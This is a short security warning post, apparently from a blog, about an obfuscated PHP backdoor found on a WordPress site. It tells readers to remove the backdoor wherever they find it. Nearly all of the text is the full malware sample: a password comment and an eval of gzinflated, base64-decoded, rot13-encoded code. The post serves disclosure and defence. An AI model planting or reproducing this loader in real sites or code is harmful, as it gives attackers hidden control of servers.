Another encoded backdoor script

Here is one more example of encoded backdoor script, found at a WordPress website. Its 100% malicious. If you find it anywhere on your website, remove it immediately.


<?php //password = sagov
eval (gzinflate(base64_decode(str_rot13("7K1eq9f2Rhwa7Qa9QmOKJ0dAYRglxdnl5pEk7ZEcLdq+5TK7nvzWxyuGcRcFyg3H//3BQW58FWnG7h6551l3fHyvZOtNt8StZOvHaTxl6xlpBTMgMaJs1aieKnsE6mI/qa4rCB0/7n8/Ks+yi/7xFqCgC+ynTm/8b9DY/GOP6U/2O4/cF98qBSZ/6Gv9kNfQFYY3CA+A3mzOoFo3Ex4Hhjzzs/FPswvYIkiAkj2R+rRs3dQZIgmkWYxcymeUh0psqb/B7ApaW+87c/QJ2K61r3OvK1ELuK394E8ZsxeG2V22u26DVByBSQx3MrgITN5916bl69vsEuA8rUq88PWZ8ZymBx7HT3yKobFia52t717w05Rm7iejfoYOHD/PlUI6b7WMuOBmxbBCSD6QC0umaRFGZS5Rp1IzMPigAuf4shmdJfvsxri03nuZhqpngGc7IU/RQfXR7LKGbT9YlhFCr+0ykdsoU/4O/m+C3GvTQhwRvEZyMpmm3V2vZBcR7vFZRv8Lyhi01Dh8QiER2roWswv0djrao9+zR+SmujOvh5eWA3nhB+6125gvu3pFo+kXRRvz947iwo2xeQ+BanUK6/jkQEZ37xGGNVSRZwPVS7uyT9eirC/jjX4lh1yoc0cwRj+mhLrGKyyjjbCOABOp9/U4RCePz8F+R49p6OSvPD70VUXGnEDjY+5jEcTWmmwwNCcW2p5tfYUwBSvYSnRT8u5Nfm8bqq4sUc8NR+MVbNFRNmOS6PjB34MQYlum2idrJ7L2r8NtoeF1Pnj3MzZ3TLK9AiOIfiHruhLfwCbgghxSx2aPxchW256Velkjkikgl0lBc11bsUoy+SB3oJ9g2Ihon4tM/bvPYRRIQGfikx5ylZCU2NSa4/7wYRr/uceN+YgtSEtNQmNoU6mDExdPIAuss2Sey5aPvN1jMzBdQIaMwm+lZhCLmMDXt5TEDtG/VnoyFTdmWWd62O0hQP7Zc9gLPEsbzDDx1jkTTLC2tqsl+9siB4sU1Kc1UDfRRdlMS1uHpvyRdJYQB4batIM8QYkexzhkZ3N747QijxpnTxZpThbe8J+c78HBPWrB7C44OMkY5MyTVDlt3dlCfNNUG2H5TQVg26AzELds90M9YlboPLFdTNiIEAFCf6SMWeDAvtms6DSeac+wvSlQKjdRBY+0TSnNPEoQ1mZN9q2tGRzewDfDu8krf3ymV7VniFAhlcFvRJRp33ANkPycwk1gisKvuY30VerKuATAkqcomVW2fXcpBw6j9zPdLE6X+gcxAVRa1cgTRLjPuzNFad3SoT3T1ebnAVCvc14LQYmuG8guZnR1bhAEBTZ4F165QNNPy3p6mk+4PDwhuX06DFLUFZfNuQrQ2rwX67xnacTx19PaNNU4rmOaWNLHGzZMyY1jQAYPwDlbX8+qVED06ioEr3nPwZyGaJtPIVz0/sqfu+b2wElxabA4R15ugho4itJNSJCL5QfB6OOqc5eCw9zdC5Xy+Wt2NP2PBDzV1P7DTwZDat576jKGn2tXXX8C82QvDa/1BJu8RlshJXYQwTm1lhR1O5jkIwlphNUN43lLo3s2SkfPZ7AIwlROovPbDDotjNeMNUxP6tdlkBCSP3FHfZMJHEPmNIhqhPQEI+hC6iH6IQOBV9PMP1zXLTcY4vWvuxfE0ljzMitgkOGw4gkD84VrwMpSWBRZytRiDiKGaGwBYDS5ov1NfSGIShCQuc5SKbVQOUESUkD30N+QjboawqDf7d35FOMFhEPaxOT1lJjuV1NAQqtZW2FEYA9dp3RvpoIEDceY3nDclQFFQVYylMdQw4wdteoJTpS4ujaxofWZ6NkkrHG3VUN+KvWlNOC4nBk4sgF7z0LQBRAvQf09XZktEDxr9cmRmHuTam6lHMWZ+wHpDvn9hHDc7/a3dkUbiCT8KRMdBgfxPtpYFwBGZkawzl7VaUa5qTb62/uzKunExtM3+zZiFZiOKSV6E28jmZeAqRbTUVdpOl+F8uyN3inqMR4JayvLnK453umFhTFsajxF52HvuZIM5grX2kfJR2bNSFTEf0IO1wF4lDv6J236oTqNZmWMjpY3YTw8u18VPg+mbRHlIpUYkTlzrGWCMGDOfcaUA0QTjgjcvTm2BnWZMGoFZ1z7Gh9lJgFcCPRA3W+Bv0Qkp1M6rSrSHfB7fu4VIGn9sa/AeGI85DEYSJz3RxfiohrPOMuLj2L+tk5priK28ZK22+ZmB2Zpfl9j/GC0j67wZ25db3IgokDln3BHwC2gGoDIoJ2B3pDuBoed/wU1egb2nBJtfFneWlP0orEIsTioPrwVn5ukt4xl2uoV9wkIAJoMJ5hWy/whSbpbJT0w1PbnBuvPPVZAd1zonmmwQ//LwWZorhvT/Mhi2QUQPT1Ld1FM1w8sCKd0VE7qOi63ppgud0z/zbl+twVHWP32llEuo6p9e+9HC7uE3jzpwoRGjMX+Iq+4pdCR6ma+XvjfuxRePFpMwTtDV80X5ZDt/ZcR6zNj2ZtG1Tj2XHZ8pLYddSS1WYkbs7ovwKT54NFWthAHef5pomtPLehxi1UddCRIKvA4KsKqDqW6CVUSFhvQMv16p+Y0+7PLn7RzcRQdOd9i4kSHJAn0zRuMs8vQWsJ9d5eb5n9ZLHJZUSPIK4OhsK2qpROqxG9J+7Pp4fh5IuNTYx9ewHWb6GjR4URw3kAtgoTidgkddAcFC0hdASUDr4u04VrmSaBzFpukqY2uR7yNmpmeW6AJb17/18nVA27mfnjjTovdFN3PIzCKu/KmI6LDY+myk48so+FVSS1vfAl7ZNvut3ghSpoGACWtCK3tmzjdUl1bhwuO1Q+GZCGwx64i2bzmWYrl8obEjU4jxMIw63KVmWiBNr0YrA7VvM1JEY6Y/23bGWUbaKztPNxqHmw+VT0FhI+WuDsB2CAiJdXlIII/YTcmGL7ymotKrMAxv9fDeclV9GcbPxZutYVyaet9m/SWzWF1pBiOkUAEVpzlboZ687Z+y2YWbKlJoEGVOqHFroK8EDkTjMBTly0hP8B9lwIc2OqI6mljXvigAyacX89fhjHpYZ25+LbnJFhIKTaAEnH1711nXz9OprhYvyi/whYJmrX0jE3gxR61I500dcAzqoWrSr0hGB4jYGcb4thziy/cu73cTZMRoGlbBGIhy3L20Q7RPcZ6TjWSekOSG8Q18vuHxxVknEGvzQDR5XFEk2VxnwmALwkAPqbfjXZGAM71LwmeRaF9NV9B1R0wggZXT4valootojJAIDGJxsfnddrUv/c5YufDaJMcsSrvKZauq74qC3T+Rmywffj7imiKoqjYVR59NNX77YKeT96zFDMZT/tL13j3TPnwQr/uD9YGUtt8QjUEw/oQbvka3xHA18VC7oo90N16Lq89CqesPHR/PPP9CP8CgF8aBV7XARnAbnpIenCq3053w086tSEVe6dbKo7ENAR08yH6+/dN8jHem2umgsoc3qiKbO4rtKebktziLhG+Nr0HhQBJGhJqDgfamRPkGnodG4sq32TzmJWVWMogq14iPzALnSCObQTzAv0EXJGA7KiPg1bLjUGri0RwYBv5GwQRQEILf/spBNo6qhwGExT+vEhHoEEF0RmHSgw12n1FuNE2REKyzwfec7KyXeQBMBXQGbyAh3n9BciAIaT6K53vytK2p34CyvZB+zKqD8M+oYdmfeHcnlSW7IXwSwwTSfN9w0qv+jiGdEuVzAWhFYArS1x570shHUGUxGipiM6Hm63lBsm0U1oXM/ujwY/vv58dhQIww23r0GlmR0IgDSQQaIkOEDlpUYfabV9VDOrLgjlDM82Yzgt3d1pk61xQctHBqZhVpkjsSCBlYMdn0q7kvv1MS7DWdHFVWDkd/IhobZpl0wCnAfkMUdzLGupHgTavouw6LCSFNcE/HC1V1n1i2Vt7h4KX90wUN1yV34faiaCQSI3XLrlpwek+3j14SzqOJz9O2dFkXYT5XUS9HMSp7vRR38l1nOghRYahZJcfhZ0UqoiRQ6GP5EDktx/PkCSGTGe0doAfUhCgzsUpnuObOUYCvDa3MQGcGWU0fu1kYvuqhyUt+caRJPFPVtdevxfH5Yvhon2gjMqMCEeQZzr8SeibiVU2zzs9ZOv2FpDoUut2oDmucw0iWBIhDrgjvo/JMzcLykaCk37yyAxtztJKl6cH69HaZO7A7rH5dTG1nbPzTAT6DNE0e0wu0UTiiGvOPvQ3K+B+fQi0DAlVpH5BXTVYglZfgE38WzE2PorDrCY4Oc7y56UkrJu8uuR0Dr+qM8D+LhE+AGRcBvLmkXssKHXskd8Fu9RjQGj0tRHqfVDmT3hq2myxxsj7/WXsWMILFwbQY5M/U8bZg2VYhLBqDcbNpHqc4vDwrUBiWm52RA+MYzYjbR17czKXDM9Dqlvu8yQlAxiOntC+tc4tTxbKODktoGcfSYzQgi1Cz4IOQ6nEl7L9ORxfinON9W5oyyWWFe8w2g832lHC/xwgV42HPQxe/K5ER1iv2HYCeLd9MqHRUBtL1gezzfAyNz8BYv70edg9reX3+uGahcG3Som/rew/qCIVCM3vH2/l9ZxGZGQQvoWC6pMIGyVdOI2xiZDq89TJlbEo+5ijOrqPezknqb2Nn6NA2oJ87nmqchEaAy/zj/mofh1Xmq5F+GoKBZVg3gqwKqSwg1qw+8RtgAgo+RXCIr6Huc+Hqkbh8tBLnIm8Xu+e9iRsChJRC1K7/JvPY/tUHclOl8v5N9Cu5E0+j/pxjt16JhcGRe2s0TiIsuUOINog1nAfkyiICaPGJEuq4as5dNFRfPbdsyK+ZpdlBQ6m34oQpZdAviXMA8pM1AjstVVjQd9pab4swit7u3TQno4/k9FEy2tXYI2WpuPD+uQTR03W2U9yY0tdMMvo18GtTIrtt/5yoM0kBFFfs1cdFStjWTmbinhnsJ5KppyFCppa9ngvLrqrLf86J+kvpl0Mvo7gE6OcxbrvkEhUTp0FbzgE2cySILMScT3MCJwdClREn0oV+WFNvYl4D34m9Yyzg86ORQRvEoSH8KxIHzZp6jQxFmEeIW8mcw9uwnOrguluMABSSdHq4O6fOrV2JvgMm/I9LGuee9Zomfm4Iuqgw+eD1zLFjo++/YF1vKoWeIBHyn3AoeFSivQ0NWkYs1/3+/E3M9Mi4LteofOaAfX8cWd3kWtQmD1kD4s0bLrjoMOhHBPPRTOgdELnp3dylxOWoQGexWgcouQGBzwKgFS5nubm+7Z/2aMAG6LzftbXvpFWuzv77aE9W7vRchJ+aekEIDaD3TWhAiYjYSgaDc2tYWgeECjzIDQaUlP0wY2SHkH8Ikui0Sp4R7IRP2Q6HVCFYVJjUNhFsBIT6VWMkacmORcxTRvZkgshLusD9TvF49MaHZm7J4pUdBbSlEM0uWa2m3d9263Ktsdgj729moKhybFwpxIw/QCAdpNUzKTU7PoLSRta5uCAFLF+uAHVrzxnuCsuH9a+iQcr7oCKYn8IR3gD7Jqk+ZSmM8sra6ORneIDA8Dr6XHTduF8HzVEiPkSv/68MzQ8Pqts5LkbqG0iDyMP+96AkiRBAyEBz53sBgykeQWXcms7bcnFIyWxaGTR4N0aXBWlN8qArfQVfpeV1AhB0Y4gOgRza+nDWybtVyUHIHJ/xcRKP5hPgLKGXyrKsXse+z3eiDZYnQTCxxD1M2VkoIVTLOcrXgRghAJAtVKM/aiMH4X1yL3P4a872l9sUyxKiCA51u3sDlrPoSoGhiUh8TFKpzWwluTVwDF/6NyybqSvWOe5ff0Fzld43zidKDoplYQhVmWEDZOfEc2wvmDJbMLj8Q+2nCX5mr797LIubio+FwO7XP+rAwCrpdm3mQWU8ON4BjQr+DwtYhJ+RRCLnyyMZKOTahPdUNHcYN58pkPKuINYKO7zcuFi35ooSRh2SMBe5saAYyX6LMXR42jvedfsLUgwI9WpDpglHYUVPVw6fJoyawFDPGqgJeDOPfSK3PDRx7GWJTXImPgclm0Jzl+opG9SYWdyR/FFBkJ4OodpVmKHnH7qmzUfpaxvSROq00SuGp8gHqHw1+Uo+A9D08U9PBsfC7+QqPIVHnLd2BAY6NJoI6J/hPeiaZgi7oC+pwHkk973qDqJQSiqKyvM/2l/SAIzdG5Fl5n7kcBdmF4q3CvJhdwE9B2wEOwz0AvE2Tm3LBsx8/iqgw2r+bx3pnXRZd6PahULCBp845jfwiCbqeNLCPHUZfBrEi2vmWBTmQ2q+XUGklYiXR7fmEvSyeaasa6G8yahR2eq3O2QlhPXCMI8ClLxc+v/ujayCRyGQPvpMYxygkXnuz75XDgDv3AzYFggGeY4VEO5oRe7jrEBDykHzM3Bn1snpipFG/8joI5CJ6kXR0kAZG+7WD+PBltxT9L3Hxu576nDz8azHzudTeiK5MVKPRHQSiMddr4AlwawVqejyp3jBIa0VKZI8jxoUZsj/CsDP8d4SnmGogRTJVDHwD3WXWbdkTUKBSjT5HtNVgDfOtQWKhz7GyOrKNw32c9oOR/+etWTbBE0Ht0xxBtHuI9vtMRDhKR4wqNzChPJGgkijxn1VdhFjFGZr7ZEQYalliBOTj4tzmDxVRlgmDn4ljBsd4168kTimnGaumTJbQo4OSAtaimOZo1vvcKmJFyzJ23JdC+8/iBwkyAN/VZ+8OMCVyuWQpe2ikd15tPA4mSoZ2OMOJ3Ie17L0ecg4Ui09CUCG5MOEbPfDzoiq4JbyvZXlFRxi2bxEwnNjfDKuIb5esa4fOVTVauuC7Y69H4qg8mnosyL8aNpkDnMTaMoj25eJY8D9dzTsncuIjgua2wLWkd2Jjw7FZZ+0eQ9Dgvzuz1d2S4uoRCQAwGfEZRl/zUXYJ4r8diXJ8pyA3iT7ZuzYnkxcDvb/cDQmELPCFVt/rTcDO1Gezh0iYDXxb8y0zXfmJKbnlkQK/1cze5Uv+y7gOk99HqY0SqiYxAsV01sHkPDSAZax09F9Zxu5rISwTx9TrwugCXpWXYG54goVqbRaeEknz8CdXkinIgZ+GydVuZ+ENpIfvulp5KWdSFPKw4iXNTxoBYrP/9pJhi1Sl+Jc5JsMfjeRUUCPsQjEPImWyy8Y5sty5ji+vBT0ksZWFcSGk2fmQpfprfFvbpiqCFvmoQyBskVGQ10zB8OjpEa5SZfjDaqeFx5PHuZZWah/wwl0BtiOXspZrCnum3QEYE0GeXoReECMaLDsGSLvlf16rW4sNPkVFZfXVL39LL2vb8n0uVIj1bSrBXTbFRwTcBQOvvrQJ6l4Kdi8VYqFihaNJLb6w06M5EYDEH3Z0DKKATWLD8+K1JxA5IXyFFDvt1IQ2c2vjzAz+/RVowHQd+dwAmdDYPXmJL+5KZfhAqOIwPrG3XvXzZFFGCA2T9f8o2EmGK4XaWVCkYrGdb2gzlopWQZaNw9I3Ps1j2hVVzo544C904+ou/gviTrli2FX7W99i71r7nagSymn7EN1322ZYIybmhSaF/fROvqqqRwtRjUkgyaUNVqGZTRNwXI4MlutcoYetmacY917xGvOG1/2f+GbsRVvUzbrdqUo1x8anNiBTQVdMaNc35U2C/glwZokvX2fb1AV2D5XYXGAg+xyNZdu4LsarP6YEcHB8w4LxhXRAOtg97qUC/uf7WIX4DiI2cJkMcoEVkMkNUxNgGUk7+9aMg5Zcls8m0f6brEhlu72CCz5m+ZUSQbeKji8yLUyxKQNCVZfdf35gi6hS0AmVgbXdLDxDBCH8VXAemjWQ8m/FjTH19iVj97hT3b02/+2VqsL+pFA24agO8Z8jGhRH9hxyTV28aEgUfQs2Q9Ne+Us3bV09I/ziN3VRk0kNDr8NNjVETYzm7nBvAAj6ImuKaP/wez7sM7LrDvSqZeaSfDNDU0b5aokr8tGpo4A7bpGqRSUG+AYdZjGP494Seoz9Q0TgCwLVn0Eg5x5xIRmZum/G5Iyp5UNmqSJW04VWnUqtAcwAE7/qwcwmSmQ7gtvQQKKc8dAhlA3A4ys5j5FJ+RvGsk2Vak45/wYuN+VpWahSZUGmBD66V2tEs87dv2PTpOTw3jMXkdxOyjBtQFTFRf5Pn4WbdPF6jGwxSfrLYkM5CIfLqBnNWwvdrBuP7Q1tQIzwtyuLYOHUAfZ63lmYckL7oL24AZwBudq25EKi7VZMQYkuxrf6sAVxfYuxJHkFZUTdXLZcS2K8btX3/t+Mry6/PLFsRT1XOBjpHBa31uoX+uz+BnRbRSXTQdFFVlFp1QtqKl4awd1tV3xGuD8FwpZf3Z2KddmLyn5ECNlzdxckkJdOFgRAU3lypuaYtmltLcIrxnaKWpJKSxFXZ7vORw/h+t5FJu+t5FwNTa6TUsD5OThWNd1K1eJ/WVt/kW4Ki98vHwA0INVIGH/bPgwvFscRg/wnrSS/RMUFrJrHaKZemufdm/DoX+XOwLiWQSg3a4QKofWuukXILMZZnTwZ1EzWBvq2kYPQZoZdmVLavBxP3JScBy3WoZTHr40i1+AAUUSIanSV1r8ld01aVkq2bvxkS6W2h4V7/u1NzMQGKo41lisBJuL3n5e/lYz/1+Ts0HQdsWMNdwi0noxQKufqh27L2ypaztKxFiG969oqgJQqMAiozUKAWJkNbrxGzCmcCmp/h8oyKjkNfb97j62BLltt3kYgs8urYOLGNdSkBqySaL5WhqwiTDdqa8DabWI/yxu+t1RFefzQMiNFGBKgLz7XgjxLnS+ZngCZqyS/JG8ClD/dRW9H7BhvdUb0vUWpcDus2kI8d4U/PK0mdsCslYwaXlcN//EyH2nfP/WyFx9gCglww2GzSrkfR/adGXl+QwhqaKph2avfcJp6hfOhhg2tw/HKdcpJfvx32xZL0nxUUHSRN1ZJoHCUU7D8UkKGRpsikkWs2qa/YPpc7sp4wVgoQMyoflrudhjyoE5Jyhc9X+Tq+VTdDp29ITbNJIbW0/YYWTPcwoe3k10y4/sT8DFcYot2Ge/wcpPZKqKQMhH8g6n2gGUfZH+124jhWxv6Bp6UZNJUptNEn25nX2sYo4DW30CMZymq/P2bH/nr8A8yq4CYz2uNzVzw0IDL0ndEgrv91RnQrOeVU+Jssd4Jr2nUUcbfejJNtVoKDW3K6m/HahuhWlampYS1JFMvvjdUxlWkH48aG90CqS2j8lAcbH3kMheflE0qEpq8aX7TFRIbg7GHaFhrNhDkQPfoRGBXQomOq8/TwWcAUOb3M4GX5gJEidlZxFGECCiNE1TmAWnWp9AS+Lr78gcEBgCRq32t5Cp/fqIQHNk97+213DINs2kMxAxdsQCquuexvy8X9vx0t0h7HQPlTL8sI27jdstO486ZVthAjjXBYhTPyvYf0LpCltnNU2UzOXKQb2uToYrsw7eh8zdend+/way1tDzDUyrFEyCFmYtj/4Ky1gIAcgr81TZmE9nqSi5qw+VT8HII74+PZZb4leaEyoXQBBrJuPUxuDKuYKG2HnoDXK0LuN3dIPl8Kbs7JnuFRZ5lEn8yNJ/vQwrLUDsXuRvcKGcu7QE5R1IndNnsZVqEdM0nQcGActPQ/CcjRhpmZjg+Vi7FCXIcTW0GwKaYrXJ1DjGUKFq2Pjv3VU12z0WuvLeLm7beQvkgtNsoJW+HQwc9VUypXnQh6d5vOokkk/jeV6ZDrwSgb2vOvuF/KPlL2gvIMpwA87uXSp6yIYpoHRZ2LO+o1nXn7byNqvvCKkf6eOtkYl/KCSjY10dzOufMTf+UqHZoyKDLigljTr7PJ2j7Ot6e0zqkaxG6bvHP4BeTccNZXzY94ZFuF/vYHBelvKJelzOh7avWc/S9t0cgfZ/2y+HK2tJHMzZxaIpQ2DwREi9zDB5ESfX6xg7TZ60yQDklFo/38sQ8eC/4hqQUKafwCIj7JPUd7cZo64s9TPdzaTf+84+lho8uqiff0QB9g6o6mbcjFVkUSMaFr1ifa+xAvTKXgo/YDknPxq4DMisE73B6+9TAnWqb1fiVmp1c+GIzHYusaY/iigb53K+k92J62qb93gx90Ah7XLFilEjImAWykRW/4f7W27PhFIAEty23hIlg0V8Vr3SaQ/KvTnXhBqsupnt3UmYHUxYSZwVtwzl8uWXTL5Clwqz0LkqCl++P7/yyBcXdnfFv4AnXNgDm3+nYhnVbNBIex37n0FK4RgJjJdEdcqNoJC03bM8IKb0BiAfbGq3t12O8tqlLW58jpgS2Kv9rChHVgt55E9h4jpzDo/B0alKnZGX6Fy0QpBOb4OIgZEgZuWrA8B0vwh7vG8JpNxq/Du/mZAhYKZoP45KEvdbNvtMdlPPgM4MTMYsGW0j7/+ldqjwnVbuGvbXRRjymYoCGOAdMVWJFer0RLrocPTTzvtODmRQ2idXGtApyn6iWvadXqMlFl5c0eBdq/FYDTqI0DpQpjciI0lwf4cS2s7byI0NOi520EzYBzRWJNUw2LygRExnXVFZKAK7N3G0vOpnwrVCOySYj4wqXI8DN96W1UfDwJlev0SgtTZ2bZJlwUhM5ogyouGCggr/sCvLnIGCh9/oqkJIaNU2bjxkHbRYQ1NH0KmcYCTuqNLkUimDucIEYt/SF/Q8PulMBvDthN25BLmC74A1TVBXZnbxJgGJ1eToZSBP/VVhkqHoO5DKDTWdcyEDCt5WK7blZMGE7M0MZpLM3odpWWqg1AUy+lzQioOKqjcKdq5qDV/VGgFOnkCegCaScDAHB2JLiAXVadwl+71Sc1P3fE/F5ml54peeMwfCE2eIdM+u45+Iz81XwI+nC8N0itW1T/OUUg/mfJZafUswaxp9e3OmGmp7lt1us1jSewETu2D/oLFlpghKbUbwrsEsFMkdgEg7aYR3/SfNt+QNgVwyx5j2y1NEUrNq3SRKDhMtvtCdEtC4njbStnvQ7UrWvdZi6QPLxESHGRjT525aWrAo4BLxbyRrud4XbD2Jw6FRLsVedwz5rP9F3alu3veEBPLezF5N2ByLyPO/HpbS566mnUDTWPoPDRERWAa+9XMdE94X4DmnH19Mwl3SaFKExC9jgRZV41TC7pJqW/NbgjH9Cecezox84W23kDK0owERZ9CwlqIlD0WkKZS8zk+Ex2U6uYypKCMphKuZSz2BZEoHSlOoc8ewKL109+xcrZoPARBrnE1nRpDqRfv11p5kMiBamgw6P4UWhXhafJmrJS+bzgVvN9ytQA+FPTWrbQNhQJz5WjIMNqBZd+JXKJYtFb/5pfTrqqbeGM0N5iyy7R8GgpS24EXlOp0b682JNfHymgjLzAA8Gi3WV6emBYADcs/lPGfvRkXJbwXihTNCV2Qbn9pKLuEecelwXnqJRn5vQQdts9ZGd5+D26J0qUNhEgm1hQfjgVuL3E8vAWN7M9tcVsZyA3anCAU/LRXlxeZqqShvmU1mSLkNYvsyNdHZYqZNTUaAacAvpty+q1ZQq6lv2VZQZ64VXsVNuKpIr1FkWOSzUtpxr4J3kg1qTKa1FjqM0SkHHiQIxFxNb4Si4iW4vXKjRHhOFJvql47GouS4EKh0oGabVLPSGVbQYLHGGLKARLXlvfBmUX/mhFTFlemXO1J5T9NabGG3bujalQhhLm4gkod9e2Rlgm92+fwapHV/HhdxgdkSjRqEBNdSOZj9Bf8DcmnZ7MxOWgrvSc+0C6Mwcfhq97K4rq9ymehh9lk/0KLZdq5732LI+VKDG4VXF4Gg9Vkfot9LzfUsditIuxVfxhNZa7ymbZDz7MoY+zitcYOVunoiYEqEaEETwpnBYLj3TaxkwRej2gyUuapTeW1TiFXjD16wTfsGJZWXOUCuqnrgtUqEFKsSfFo8kXKeGRbAyrdlPswa/jLqBCWuga9AapjfqBUcUJxRaz83GtIYq3J73O7ZRXQnL+8sQQNxKiq7TWNX4OETZEUsykUXNc9g4rsVXzCk1wEc/Y2IeqgQwRNN2jnY/+JELhshatqzbS2CeSB3CB8CYa0TsA/YHKbjTrhhROirhgFoKQy1J4vGN1TJ6EeD6Ug6Z9QPwpd/MOX0DWldZkzecod83klsRUBj4pye4YRTVqI681CqwJZ+bXdvtdiDBesqQWO9F9n1RjQRXjqWIGGkXKG7xBu/F+7WaceJrcXfJoP1UI69tfaqc88LbWP0e679XxwCyIAZT5CGVTWGkmfACWGdUGqqodWD5xbEsbrAVbBfPxJDryT5VQw/zZ2pzX+WfL38G0rBD0wNI9SFv+6zFG8X3/xa3rBqgno8aZCQ13D5+3was19ybGf9r4aadc5wRANNdLGVVsDtlVS8KW3E6K38GvSzsuv/0OakhUCHlSCdaQr3ryRyMHYOAyE+jrcaTY0ckVIEKljv0DI0cQElbnul4IbEoKplLRFa2IO6nBfM2LhSeKAsx3u5KMZuEOrXI3noDhqzs9rK2LfWMOKk6ngiZMVRxgosiYCtRe7Ljy7m11r0VQ3T7ltmIm/Hl/bUjdqbV3Gaoker2RtwbiRPj91sbBG7es66NeIDOhJrIFICKuUx+nkvS81m+Z2R6JAXkwVUfXqye6FbcU1ji2TaPjKZZgHZQHTzlfancyhvi9ffZ9PypbdJWArxIceLpEBX6ItXEjdiAkvkJcgn1aCKBi7CUBgiTphugOWhmYoEVbg45+y/J3ggWZm1Y7Lp9qh3KI9O12McQloQDquhDCvAkDA80bc8N+2fiE6/oLuSooxhpmSz11YPogvY+U5tv/yZJlMQfCHP3GxTjBO0w06rP0uTMAn8+DPxybDQ8ijLM+WRTKTbRYH5aPFE+oaOfjFbsGZwnqTszAX7QN9ei+Yu2k6xN7BnwstB8oHo2zmuGxxxPcoPug6Su2ib9+odj+mOSwyNZGqnUTun6ksy1bF34BXN4b6rlpIfexIXG/qc5Ov/NfKnwl/JdncfCxMH7Sl+aayu92HImZr9GrqzqydblVheunToCVjodfb3suXq3km2+x08C6LhhKacvK1+IPIHxgqfbCU+UHFAR6ILoq0Qt/rsa65s1GEclU1EsMHaeSH5h/FOHSWsR6JCgG3IoyYXWB+BAG3t3XAbHjeosALVc1Ll7FJ6L5fUdNG6BIIECyQrQkaynHyb7dtFWLbWcByQerXeHKYAS1EXovcvPqrlI7YD6sak4PNyWSpcI8893+4AG0sfTXcefCRsABx72WK02XOmVBBbaKXRhVhUHSCuQv2rLkwBqOTNlzV5t1SivuXQo4z3xhTJxD3XfwpaFMWTXukuiy7xqB7kOQBhxiBgHL7TgF4knAgT3TsH/aJ1TKeux470wpSbDEruuwwabu7xTYrYxRxhMSkl8G3HnFdPIZRKHX4QS0kRWoY+Yr1Hs9kYKY7Drw96q6wboYM1wOB90ZmN1YZ58+U9b9kTkss30fbeRWkGr5T9+3EGAn1BlyEyek7JCP0kWy7cWL7anJh/+E+LdLKIiopIHdbATyGDOeMoG0qTE66TDr3qVFzNf1BY2fgKCY9BKXPih9TVOts1K95VzG4vX/KYUyO0xgDZhJ1CZkWRcuBfQ03zWmZ21MAa5qWypbEbtg1YzYF2ZBb2elVQeXO4sRhw9V8mjRIaSKYR4j3BeItdHObOAPg2T3UAssmtKPvASIoQBxalF0QaPVzR9Sixw5C9IlT9WgHzD7dO/BhQBf3ZDz4AMsTlQFc7hM+umjDYqC9iHVGc2v3jy5qHP17MuqKX10jf3PwlScZ/S1YrwdaE2iyh5olYSJa55yOL+4oR84tGOvU5GcJrbGXUKCyUwQaSuiQSFGUcOEsNdOHXOu96jl1oUSJ4sPGukJhVyyLbEmAhmyaGx6myFxVyqP1MEm9/RWmmzwHAkXNXQpiVltHXXy9L+2px8YLjaulPd122RcU+Gpqt8mfXdCuE2MrgTO0Ng9iUcbs1Oyhf2y2+YaTBl8gdTXSrgmqdovAgag4K9hFzWkSzYww3WXLkbJLAhISSKY8MOoimskxj4p1hFrbKZHGu7wuEKhsLn9wvV7K3aQx4kHS+PVwrIPPr42KnBCwog+w5O3peZrUV1r41qbahA/AcL++AxhKfwuU5wVnjmWySmbLMP5VjZ1e0laavanglMJtKR4agAic5Dsrs8XiooyFeuLgDdOio9UEMyFiMR8CA9KcLK5HxGdvcr3QhquiT3rX8zvBXBpmSQBzXWnnb/VPVwgclIaeroUxGk3kSbEdM3Ori5SvycnxpLR+by3xOJb9I0OwdOfsfus+ZKz/A3+SSH/ipfBFWQ0bHEDPnQ5SGW7sd/XXFSJ4TF9P8PLAKTMK5pH3qxH5csUtxMDxYylcHeRdgbEgAyl2ypvakJvueOIhCqH2WKW5xG5JQk5Vo1Icsmqm0DIyJ+36khcdlMCqYkN8oNf3plZQ7uU+ANya5nqIPaJqE1wlIuhXZ+ujBITsADyFRJzyFCedb8iREUikeiPeDew3q+UygexG+7VqpJpvjxfjrlNHKOz4FRc+psD/p+D/Lkhpp58XgkEvkDcAtSoX1zDRjfpp2v1AzVw0KaTVNDW1UATHCX+hCxXKgsauYXlgYHfnd+LZA1GKGQ5XEH4g0uSAspdYdKgz8hbEBK6ZDmJ3l7VbmyqF7FzLiBGVAUWw2T1uHGZic24b2Yxv0WcMOw+nVuNxS9JTMSdX1N0SxOIgfxzBaFh3a+YAjhNEuVE8hAWRHDij3+xw9vaEhEDiaghAp/gukx6qM8w0qtKkMUcG4i+WhrGhdP5YQVBE0RG4FPw1WPqz7Vk5wdDwNHXf0eShVq7e4bszqLkHMZhTXbTREALIbeXat6pk7c7O8NtOcT0jpf1DVjGC+oN5wvD97ddOS1rWMhA6OPfmV904HRoIeepLX+SkVodMQeVlL+DXzS+JtTxNbwgu1usPlZA3TboGaNLGO8uXjpBUnikPdjJ44y1iTfsywS4EZA7QOab/D7fPTOEFm7oyH2uYuWY3xT3Vf+dd4p2jtCFMR2eWCJ1OU0fmdA74xEf9wqD20TCJULbL0x36HEsldr/e9ZZiKMR6QFbAdmZKyMZJYTlwfrCwzPoAdxo1d6yLBieFiEGn5yC8m8wGZCWxtFHAUQui8dMGM+afdnh4vfpqq5EqJcRu7FUXe0zAV3Ce2Ht1Hbat2IoZCwGPusD9g6j0NSBdca3SmIWt6uHtIxJY+PVMgojPZKpYpM7+DST9ysdjBN7J9+bXATxge3FXTM1JFrxW3MuCpqdtXp/p6yz5L3cZ7+wLr47ae6uknpnN4rz0UVFcJLVV8jyCsBU0nHaArSQjys+zhxwIiSq3Hj7q3lW8uS78J9J5TgF3q/83EbdHg9eXT+4bLPv/qlogSGH/LOnsBpFxGCzs4+8NN7Raocmt9pYKutoPD5OL0yB49dsiqIgen1oAKR6ePZ+zDyf02kBH4OxMF8w4kgaVIVdCjlv6dqIdmQkwGToLjtUISOJGu2FT5yLsHbb7g7clGB/I8dZmHdCF8FTZHmCPcc4FurceGp9MTMeJcDnRhtjSVipPYlyoqS1HgvHOmKJ9ogHlDEsCl+s9u+rI87w2R55zOhJUqFupJnpwgGePmX/Y6pzVHuyXUtyOR3u4s04PqFkoXzPifeTodJLprN1NbqtYCBrl5G1hFG2fiWTlsz22H7AYXyTq8ck76KyOjIjuDFhk2Gy0aMYqNvHRH4jrlytNohILXel7nY6saVcs373OXAVYGrfcHltZXLMuDatDhLcHWmVrZ3Md0zkLKZWAZPOgfH+ZCHsRHMoyO